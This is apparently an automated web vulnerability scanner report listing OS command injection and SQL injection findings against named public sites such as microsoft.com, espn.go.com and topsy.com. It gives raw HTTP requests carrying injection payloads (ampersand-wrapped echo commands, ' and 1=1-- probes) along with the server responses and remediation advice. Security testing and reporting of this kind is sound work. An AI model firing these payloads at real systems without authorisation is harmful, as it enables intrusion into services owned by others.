16.27. http://www.lexus.com/lexus-share/js/lexus_3_5.js

16.28. http://www.wilink.com/

16.29. http://www.wilink.com/info_request.aspx

17. HTML does not specify charset

17.1. http://espn.go.com/mlb/format/design09/index/playerRatingsTopTen

17.2. http://espn.go.com/mlb/news/story

17.3. http://www.aol.com/ads/load_v7.html

17.4. http://www.cricshop.com/Replica-Cricket-Kit/

17.5. http://www.cricshop.com/favicon.ico

18. Content type incorrectly stated

18.1. http://cdn.cricshop.com/css/jquery.autocomplete.css

18.2. http://espn.go.com/espn3/search/indexFeaturedEvents

18.3. http://espn.go.com/mlb/news/story

18.4. http://www.lexus.com/lexus-share/js/thirdParty/bottom_navOutput.js

18.5. http://www.lexus.com/lexus-share/js/thirdParty/vehicleNavigationOutput.js

18.6. http://www.smokeybear.com/favicon.ico

18.7. http://www.yourlexusdealer.com/_scripts/LDA_Toll_Free_Numbers.json

18.8. http://www.yourlexusdealer.com/_scripts/yourlexusdealer.json

18.9. http://www.yourlexusdealer.com/lexus-share/js/tracking_omn/JSON/omni29.json



1. OS command injection  next
There are 2 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:



1.1. http://www.microsoft.com/downloads/details.aspx [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.microsoft.com
Path:   /downloads/details.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands and retrieve the output in the application's responses.

The payload %26echo%207244131218a72ce9%2042240a205b35cc82%26 was submitted in the REST URL parameter 1. The application's response appears to contain the output from the injected command, indicating that the command was executed.

Request

GET /downloads%26echo%207244131218a72ce9%2042240a205b35cc82%26/details.aspx HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Page not available
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 27984042600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 07 Nov 2010 00:53:47 GMT
Content-Length: 23911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<a href="http://search.microsoft.com/Results.aspx?mkt=en-US&amp;qsc0=0&amp;q=downloads+ecko+7244131218a72ce9+42240a205b35cc82+details+aspx">downloads ecko 7244131218a72ce9 42240a205b35cc82 details aspx</a>
...[SNIP]...

1.2. http://www.microsoft.com/downloads/details.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.microsoft.com
Path:   /downloads/details.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands and retrieve the output in the application's responses.

The payload %26echo%2060a2c32dddfb8586%206f05be19f3af2e55%26 was submitted in the REST URL parameter 2. The application's response appears to contain the output from the injected command, indicating that the command was executed.

Request

GET /downloads/details.aspx%26echo%2060a2c32dddfb8586%206f05be19f3af2e55%26 HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not available
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279156141400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 07 Nov 2010 00:54:41 GMT
Content-Length: 23918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<a href="http://search.microsoft.com/Results.aspx?mkt=en-US&amp;qsc0=0&amp;q=downloads+details+aspx+ecko+60a2c32dddfb8586+6f05be19f3af2e55">downloads details aspx ecko 60a2c32dddfb8586 6f05be19f3af2e55</a>
...[SNIP]...

2. SQL injection  previous  next
There are 14 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://deepquest.code511.com/blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-??-ms-sql-server-fingerprinting-tool/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://deepquest.code511.com
Path:   /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blog'%20and%201%3d1--%20/2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ HTTP/1.1
Host: deepquest.code511.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Set-Cookie: 90plan=R1531185612; path=/; expires=Tue, 09-Nov-2010 13:19:02 GMT
Date: Sun, 07 Nov 2010 00:58:20 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /blog' and 1=1-- /2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/
on this server.</p>
</body></html>

Request 2

GET /blog'%20and%201%3d2--%20/2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ HTTP/1.1
Host: deepquest.code511.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Set-Cookie: 90plan=R3938921532; path=/; expires=Tue, 09-Nov-2010 13:19:04 GMT
Date: Sun, 07 Nov 2010 00:58:22 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /blog' and 1=2-- /2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/ was not found on this server.</p>
</body></html>

2.2. http://deepquest.code511.com/blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-??-ms-sql-server-fingerprinting-tool/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://deepquest.code511.com
Path:   /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-...-ms-sql-server-fingerprinting-tool/

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-'%20and%201%3d1--%20...-ms-sql-server-fingerprinting-tool/ HTTP/1.1
Host: deepquest.code511.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Set-Cookie: 90plan=R3938638392; path=/; expires=Tue, 09-Nov-2010 13:19:04 GMT
Date: Sun, 07 Nov 2010 01:04:49 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-' and 1=1-- ...-ms-sql-server-fingerprinting-tool/
on this server.</p>
</body></html>

Request 2

GET /blog/2010/11/06/exploit-next-generation-sql-fingerprint-esf-'%20and%201%3d2--%20...-ms-sql-server-fingerprinting-tool/ HTTP/1.1
Host: deepquest.code511.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Set-Cookie: 90plan=R2613683612; path=/; expires=Tue, 09-Nov-2010 13:19:02 GMT
Date: Sun, 07 Nov 2010 01:04:50 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
X-Pingback: http://deepquest.code511.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 07 Nov 2010 01:04:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Nothing found for Blog 2010 11 06 Exploit-next-generation-sql-fingerprint-esf-\'%20and%201%3d2--%20...-ms-sql-server-fingerprinting-tool</title>
<meta name="generator" content="WordPress abc" />
<link rel="stylesheet" href="http://deepquest.code511.com/blog/wp-content/themes/pyrmont-v2/style.css" type="text/css" media="screen" />
<link rel="shortcut icon" type="image/ico" href="http://deepquest.code511.com/blog/wp-content/themes/pyrmont-v2/images/favicon.ico" />
<link rel="alternate" type="application/rss+xml" title="__&#8211;::: Deepquest :::&#8211;__ RSS Feed" href="http://deepquest.code511.com/blog/feed/" />
<link rel="pingback" href="http://deepquest.code511.com/blog/xmlrpc.php" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="http://deepquest.code511.com/blog/wp-content/themes/pyrmont-v2/scripts/basic.js" type="text/javascript"></script>
               
   <script type="text/javascript">//<![CDATA[
   // Google Analytics for WordPress by Yoast v4.06 | http://yoast.com/wordpress/google-analytics/
   var _gaq = _gaq || [];
   _gaq.push(['_setAccount','UA-209501-1']);
   _gaq.push(['_trackPageview','/404.html?page=' + doc
...[SNIP]...

2.3. http://espn.go.com/espn/fp/pollDataGenUniversal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://espn.go.com
Path:   /espn/fp/pollDataGenUniversal

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11430324'%20or%201%3d1--%20 and 11430324'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /espn/fp/pollDataGenUniversal?id=101119&111430324'%20or%201%3d1--%20=1 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://a.espncdn.com/prod/assets/totemPoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289009493; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; SEEN2=JxMLA9EOJxMLA9EO:; TSC=1; espnAffiliate=invalid; ESPN360beta=betaSet; lang=en; DETECT=1.0.0&90557&15933611&1&1; s_pers=%20s_c24%3D1289010420966%7C1383618420966%3B%20s_c24_s%3DFirst%2520Visit%7C1289012220966%3B%20s_gpv_pn%3Despn%253Ahome%253Afrontpage%7C1289012220978%3B; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; jt_time=1289010421056; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A12%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A14%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289010396278%7D

Response 1

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Sat, 06 Nov 2010 14:18:19 GMT
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 06 Nov 2010 14:18:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 14:20:29 GMT
Content-Length: 647
X-UA-Compatible: IE=EmulateIE7


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Untitled</title>
</head>
<body>
&domain=.go.com&questions=1&expected=1&pollId=101119&voted=false&globalID=135551&questionID=101030&serviceName=SZ&pollquestion=Which+is+the+best+team+in+the+AFC+at+midseason%3F&ts=1257058800000&answerID1=359365&polltext1=Colts&poll1val=18357&answerID2=359366&polltext2=Jets&poll2val=9737&answerID3=359367&polltext3=Patriots&poll3val=39755&answerID4=359368&polltext4=Ravens&poll4val=11296&answerID5=359369&polltext5=Steelers&poll5val=24582&pType=0&tAnswer=5&load=true&
</body>
</html>

Request 2

GET /espn/fp/pollDataGenUniversal?id=101119&111430324'%20or%201%3d2--%20=1 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://a.espncdn.com/prod/assets/totemPoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289009493; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; SEEN2=JxMLA9EOJxMLA9EO:; TSC=1; espnAffiliate=invalid; ESPN360beta=betaSet; lang=en; DETECT=1.0.0&90557&15933611&1&1; s_pers=%20s_c24%3D1289010420966%7C1383618420966%3B%20s_c24_s%3DFirst%2520Visit%7C1289012220966%3B%20s_gpv_pn%3Despn%253Ahome%253Afrontpage%7C1289012220978%3B; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; jt_time=1289010421056; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A12%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A14%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289010396278%7D

Response 2

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Sat, 06 Nov 2010 14:18:03 GMT
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 06 Nov 2010 14:18:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 14:20:18 GMT
Content-Length: 668
X-UA-Compatible: IE=EmulateIE7


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Untitled</title>
</head>
<body>
&domain=.go.com&questions=1&expected=1&pollId=101119&voted=false&redirect=/index.html&globalID=135551&questionID=101030&serviceName=SZ&pollquestion=Which+is+the+best+team+in+the+AFC+at+midseason%3F&ts=1257058800000&answerID1=359365&polltext1=Colts&poll1val=18242&answerID2=359366&polltext2=Jets&poll2val=9685&answerID3=359367&polltext3=Patriots&poll3val=39503&answerID4=359368&polltext4=Ravens&poll4val=11211&answerID5=359369&polltext5=Steelers&poll5val=24435&pType=0&tAnswer=5&load=true&
</body>
</html>

2.4. http://topsy.com/link [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://topsy.com
Path:   /link

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /link?1%20and%201%3d1--%20=1 HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Set-Cookie: utid=1b53e27422c045ecfea18a5b4afb9f7d; Path=/; Version=1; Domain=.topsy.com
Set-Cookie: topsy_session=646541ab67596649e143fb725a5ce81a613d22ce; path=/; expires=Sat, 13-Nov-2010 17:22:08 GMT; HttpOnly
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 10:27:08 -0700
Content-Length: 0
Connection: close
Date: Sat, 06 Nov 2010 17:22:08 GMT
Server: lighttpd/1.4.26

Request 2

GET /link?1%20and%201%3d2--%20=1 HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 10:27:09 -0700
Set-Cookie: topsy_session=21a273ef478b6f2b5c0c2160b7a80a514b9af8ae; path=/; expires=Sat, 13-Nov-2010 17:22:09 GMT; HttpOnly
Content-Length: 0
Connection: close
Date: Sat, 06 Nov 2010 17:22:09 GMT
Server: lighttpd/1.4.26


2.5. http://topsy.com/top [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://topsy.com
Path:   /top

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /top'%20and%201%3d1--%20 HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Set-Cookie: utid=6c97d63f6c53fa548d800ef6752a5ea7; Path=/; Version=1; Domain=.topsy.com
Set-Cookie: topsy_session=5c1b89711f0266bb3df75c077754ff78efa724ff; path=/; expires=Sat, 13-Nov-2010 17:22:56 GMT; HttpOnly
Content-Length: 13380
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 10:27:56 -0700
Connection: close
Date: Sat, 06 Nov 2010 17:22:56 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>
Twitter Trackbacks for

http://top'%20and%201=1--/
[top'%20and%201=1--]
on Topsy.com
</title>
<link rel="canonical" href="/top'%20and%201=1--/"/>
<meta name="y_key" content="6ce439d53087ec3f"/>
<meta name="viewport" content="width=device-width"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
<meta name="msvalidate.01" content="CAE426C8C3272CF554246FC747D6F96D"/>
<link rel="icon" type="image/png" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="shortcut icon" type="image/x-icon" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="search" type="application/opensearchdescription+xml" title="Topsy Search" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/opensearch.xml"/> <link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/topsy-all.css"/>
<script type="text/javascript" src="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/js/topsy-all.js"></script>

<!--[if IE 7]>
<link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/ie7.css"/>
<![endif]-->

<script type="text/javascript" id="topsy_global_settings">
var topsy_style = "small";

...[SNIP]...

Request 2

GET /top'%20and%201%3d2--%20 HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Length: 13380
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 10:27:56 -0700
Set-Cookie: topsy_session=8f7823e982913be003f29528e10af98f9572a196; path=/; expires=Sat, 13-Nov-2010 17:22:56 GMT; HttpOnly
Connection: close
Date: Sat, 06 Nov 2010 17:22:56 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>
Twitter Trackbacks for

http://top'%20and%201=2--/
[top'%20and%201=2--]
on Topsy.com
</title>
<link rel="canonical" href="/top'%20and%201=2--/"/>
<meta name="y_key" content="6ce439d53087ec3f"/>
<meta name="viewport" content="width=device-width"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
<meta name="msvalidate.01" content="CAE426C8C3272CF554246FC747D6F96D"/>
<link rel="icon" type="image/png" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="shortcut icon" type="image/x-icon" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="search" type="application/opensearchdescription+xml" title="Topsy Search" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/opensearch.xml"/> <link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/topsy-all.css"/>
<script type="text/javascript" src="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/js/topsy-all.js"></script>

<!--[if IE 7]>
<link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/ie7.css"/>
<![endif]-->

<script type="text/javascript" id="topsy_global_settings">
var topsy_style = "small";
var topsy_nick = "TopsyRT";
var topsy_order = "count,badge";
var topsy_streaming = "on";
</script>
<script type="text/javascript" src="http://cdn.topsy.com/topsy.
...[SNIP]...

2.6. http://topsy.com/top [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://topsy.com
Path:   /top

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 17886169'%20or%201%3d1--%20 and 17886169'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /top HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=17886169'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Set-Cookie: utid=4e58cccbbde70f24f775bdb79cd47f7f; Path=/; Version=1; Domain=.topsy.com
Set-Cookie: topsy_session=862148fb4ac5e972ca6861083d3ab3e49ed00a84; path=/; expires=Sat, 13-Nov-2010 17:22:35 GMT; HttpOnly
Content-Length: 13102
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 10:27:35 -0700
Connection: close
Date: Sat, 06 Nov 2010 17:22:35 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>
Twitter Trackbacks for

http://top/
[top]
on Topsy.com
</title>
<link rel="canonical" href="/top/"/>
<meta name="y_key" content="6ce439d53087ec3f"/>
<meta name="viewport" content="width=device-width"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
<meta name="msvalidate.01" content="CAE426C8C3272CF554246FC747D6F96D"/>
<link rel="icon" type="image/png" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="shortcut icon" type="image/x-icon" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
